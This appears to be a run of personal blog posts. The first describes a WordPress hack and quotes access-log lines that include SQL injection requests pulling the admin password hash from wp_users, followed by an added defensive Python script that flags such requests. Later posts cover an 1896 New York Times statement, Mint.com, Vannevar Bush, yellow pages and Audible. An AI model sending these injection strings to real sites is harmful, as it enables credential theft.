Last week, this blog was hacked. As far as hacks go, it was pretty minor: traffic coming from search engines was redirected to a spammy search engine (your-needs.info) with the query from the Referer header being passed along. Traffic from other links apparently didn’t get redirected.

The hack is described at the WordPress forums and appears to be spreading.

I’ve been running an ancient version of WordPress and had meant to upgrade, but it never seemed urgent; hopefully, I’ve learned that lesson. While upgrading, I decided to upgrade from the default WordPress 1.X theme I was using to this very nice Classy theme by Benedikt Rieke-Benninghaus, though I’ve already started tweaking it.

Thanks to Mike Hochster for telling me that my blog was broken and Brian White for pointing me at easy instructions for keeping WordPress up to date.

For the curious, I suspect the attack corresponded to one of the following log entries:

84.244.147.70 - - [27/May/2008:21:29:19 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-admin/ HTTP/1.1" 302 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 782 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 391 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "GET /xmlrpc.php HTTP/1.1" 200 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 941 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=2 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=3 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=4 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=5 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=6 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=7 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:40 -0400] "GET /wp-trackback.php?p=8 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=9 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=10 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=11 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=12 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=13 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=14 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=15 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=16 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=17 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=18 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=19 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=20 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=21 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=22 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=23 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=24 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=25 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:47 -0400] "POST /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
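
An added example, not part of the original post: a small Python triage script that parses access-log lines like the ones above, percent-decodes each query string until it stops changing (so the double-encoded %2527 quote is seen as a quote), and reports requests whose decoded query contains UNION SELECT. The function names, the regular expressions and the three-round decode limit are assumptions of this example; the sample lines are copied from the log above.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# UNION followed closely by SELECT, checked after decoding
SQLI_RE = re.compile(r"\bunion\b.{0,20}\bselect\b", re.IGNORECASE)
# Blog software turns ASCII quotes into typographic ones when logs are pasted
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2033": '"'})


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable, so %2527 -> %27 -> ' is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_sqli(lines):
    """Return one finding per request whose decoded query has UNION SELECT."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.translate(QUOTES))
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        decoded = fully_decode(query)
        if SQLI_RE.search(decoded):
            findings.append({
                "ip": m["ip"], "time": m["ts"], "path": path,
                "status": int(m["status"]), "size": m["size"],
                "double_encoded": "%25" in query,
                "decoded_query": decoded,
            })
    return findings


UA = '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"'
# Sample lines copied from the log above; the last keeps pasted typographic quotes
SAMPLE = [
    '84.244.147.70 - - [27/May/2008:21:29:19 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"',
    '87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 941 "-" ' + UA,
    '87.118.112.44 - - [27/May/2008:21:35:36 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" ' + UA,
    '87.118.112.44 - - [27/May/2008:21:35:37 -0400] \u201cGET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1\u2033 200 8256 \u201c-\u201d ' + UA,
]

if __name__ == "__main__":
    for finding in find_sqli(SAMPLE):
        print(finding)
```

A 200 status on a flagged request only shows that the page was served; the log alone does not show whether the query returned anything.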

Adolph S. Ochs, New-York, Aug. 18, 1896:

To undertake the management of The New-York Times, with its great history for right doing, and to attempt to keep bright the lustre which Henry J. Raymond and George Jones have given it is an extraordinary task. But if a sincere desire to conduct a high-standard newspaper, clean, dignified, and trustworthy, requires honesty, watchfulness, earnestness, industry, and practical knowledge applied with common sense, I entertain the hope that I can succeed in maintaining the high estimate that thoughtful, pure-minded people have ever had of The New-York Times.

It will be my earnest aim that The New-York Times give the news, all the news, in concise and attractive form, in language that is parliamentary in good society, and give it as early, if not earlier, than it can be learned through any other reliable medium; to give the news impartially, without fear or favor, regardless of party, sect, or interests involved; to make of the columns of The New-York Times a forum for the consideration of all questions of public importance, and to that end to invite intelligent discussion from all shades of opinion.

There will be no radical changes in the personnel of the present efficient staff. Mr. Charles R. Miller, who has so ably for many years presided over the editorial pages, will continue to be the editor; nor will there be a departure from the general tone and character and policies pursued with relation to public questions that have distinguished The New-York Times as a non-partisan newspaper — unless it be, if possible, to intensify its devotion to the cause of sound money and tariff reform, opposition to wastefulness and peculation in administering public affairs, and in its advocacy of the lowest tax consistent with good government, and no more government than is absolutely necessary to protect society, maintain individual and vested rights, and assure the free exercise of a sound conscience.

See more in History of the New York Times, 1851-1921 and Discovering the News: A Social History of American Newspapers.

First of all, congrats over to the team at Mint.com for going live and winning the Techcrunch40 prize. As a die hard Quicken user, I think it’s great that companies are pushing in this space. I can’t say I save money or time by using Quicken, but it lets me feel in control. (And I could always tell when I wasn’t feeling in control of my finances, because I would avoid Quicken.) I wish Mint much luck.

But I’m also left with a slightly nostalgic feeling — and even a bit of jealousy — because I tried to create a similar venture back in late 1999. I was coming off of another startup (which I got wistful for when I first heard about Entise Systems and Azul Systems), all my friends were starting web companies, and I thought that what the world needed was a web-version of Quicken. At the time, everyone I talked to thought it was a crazy idea. People wouldn’t trust some web company with access to all their accounts. I was too late and the market was going to be owned by Yodlee or MyCFO. Only obsessives used Quicken and they were already satisfied.

I built a small prototype that could import my Quicken data. And I managed to disable my Bank of America and American Express accounts a few times while building screen scrapers for them. More importantly, though, I learned a few lessons about startups (don’t try to do it as one person — you need moral support and someone to bounce ideas off of) and about myself (I’m good at technology but not at sales). And, after working on it for a few months, I realized I wasn’t actually interested in building and selling the product, only in using it. So, I closed it down and took a job at a startup some friends had founded, which then disappeared with most of the rest of Web 1.0.

I wonder if it’s still a crazy idea. I hope not. Mint, with their scraping and auto-categorization, seems to have done a nice job. I suspect I’m going to hold off on using Mint.com, because this is one kind of data I actually like to have sitting on my hard drive and not out in the cloud. At least for now.

I finally read Vannevar Bush’s essay As We May Think for the first time this week. For something written in 1945, it’s amazing; for that matter, if it had been written in 1975, it would have been just as amazing for its uncanny predictive power. He outlines something very close to the modern digital era. If you haven’t read it, you should.

Of course, it’s off on many details, comically so in some cases. His discussion of “dry photography” and the process of distributing books in microfilm form remind me of the pneumatic tubes of Brazil. With transistors still two years out, I guess “thermionic tubes” were the right technology to talk about; that they’re now used only by die-hard audiophiles might surprise him.

Where Bush falls short about technology is in not predicting the pervasiveness and connectedness that we have. Yes, scientists and researchers use modern day “Memexes,” but so do people looking for people, movies, restaurants, travel, trivia, porn, and a million other topics. The information in our memexes is distributed among a wider array of machines, all connected, giving a much larger field of information available to everyone. We also use the internet for forms of communication — blogs might have been predictable but eBay probably wasn’t — that I don’t think Bush envisioned.

Bush was better on technology than social trends. He didn’t foresee shifts in gender roles; these days, scientists type for themselves and “a whole roomful of girls armed with simple key board punches” are not transcribing the thoughts of great men. He predicted that books would be the unit of transfer, where the web “page” model is much finer grained. That almost all of us are still typing, rather than speaking for human- or machine-transcription, is an artifact of something else that I think is hard to predict: when we’ll adapt machines to our behavior and when we’ll adapt our behavior to what machines do easily.

But all that’s incidental to the astounding accomplishments of prediction in this essay. Search engines are trying to deliver on the potential of the Memex and he described information retrieval better than most people can today. The combination of digital photography and “radio” (or, as we think of it, “wireless”) is probably ahead of where he predicted and book digitization is almost there. His description of browsing and navigation makes an interface of windows, scrollbars, and a pointing device (though not a “lever”) seem almost obvious.

(Props to The Atlantic for being true to the spirit of the essay by making it easily accessible.)

This is rainy season in San Francisco. It’s also, unfortunately, the time of year when Pacific Bell SBC at&t delivers new yellow pages.

I just about stopped using the yellow pages nearly a decade ago, long before I started working at a search engine and long before there was good integration of local information with general searches. Certainly by the time I had always-on internet access at home, I gave up using a printed yellow pages except in the rarest of cases. If the local business has a website — almost always true for a restaurant, for example — and you can find it, the web is great. If it doesn’t, the presence of online yellow pages means you’ll at least get the basic contact information and, in some categories, third party reviews and discussion.

On the other hand, I have at least one friend who swears by the physical yellow pages these days. He loves how easy it is to find the big, credible players, because they buy display ads. And those big ads contain lots of information, often including open hours, manufacturers whose products the store carries, a map, and details that might give you a feel for the business. Exactly what you’d hope to find on a website.

Many of those display ads are placed by local businesses that don’t have a website. For example, one of our local hardware stores (Tuggey’s on 24th) has no website and the other (Cliff’s Variety on Castro) appears to have added a website only in the past few weeks. (Go, Cliff’s!)

So, when this year’s yellow pages turned to a pile of liquidy grey sludge after a couple of hours of waiting for us on the front steps, I wasn’t particularly disappointed. What surprises me is the people who would still be disappointed. And more surprising are the merchants who spend a significant amount of money to reach those people, but don’t even attempt to reach people like me.

Given my long commute, I swear by audiobooks. I used to borrow books on tape from my library, but for a little more than a year I’ve been a customer of Audible.com and download books. While no service is comprehensive, Audible does have a very good collection of books.

Audible’s site, however, has always been terrible to use. This makes no sense: they’re a web-only business, so they should have put some effort into their site. But the navigation was always difficult, downloading was awkward, and, most importantly, the site was always too slow. Fine, the downloads take a long time, but navigating the site should be quick and zippy. (Here’s a hint, folks: put the big downloads on a separate pipe from your home page.)

Audible recently changed their fee structure (a little more money, but credits roll over from month to month — probably a good thing) and, at the same time, redesigned the site. I’m not going to comment on the new green-on-green look, but the substance of the redesign has two good changes and a few bad ones.

Good change #1 is that downloading is much more straightforward and is now set up for downloading multiple files at a time. Good change #2 is that they no longer make use of broken JavaScript for every link, so that middle-button-click now opens pages in new tabs for me.

The bad part is that navigation seems even worse than before. Each page used to have genre and category links in a sidebar and a search box in the upper right; both are now gone, replaced by, respectively, a tips box that always seems to say “Great choice! You spent money with us!” (my paraphrasing) and a viewer for the current contents of your shopping cart, which seems useless for those loyal subscribers who tend to pick one audiobook at a time, as their plan allows.

Unfortunately, the site, if anything, is slower than it was before. So slow that images time out all the time, breaking their fragile HTML layout in odd ways. So slow that one of every ten of my page views ends up with a “couldn’t contact server audible.com” message. So slow that I find myself needing to do other things (like write flames about Audible) while I try to navigate their site. Sigh.

It’s not as if there’s not good examples of online bookstores…

While I’m grumbling about Audible, why do they give the same filename to all the parts of the same book? For example, I just downloaded Zadie Smith’s On Beauty. It comes in three parts. Why are all three files, when I download them to my Mac, named “OnBeautyUnabridgedPa_mp332.aa”? I assume the “Pa” is a vestigial reference to “part 2,” but why doesn’t that get precedence over “Unabridged” or “mp332” — both of which, from my perspective, are boilerplate.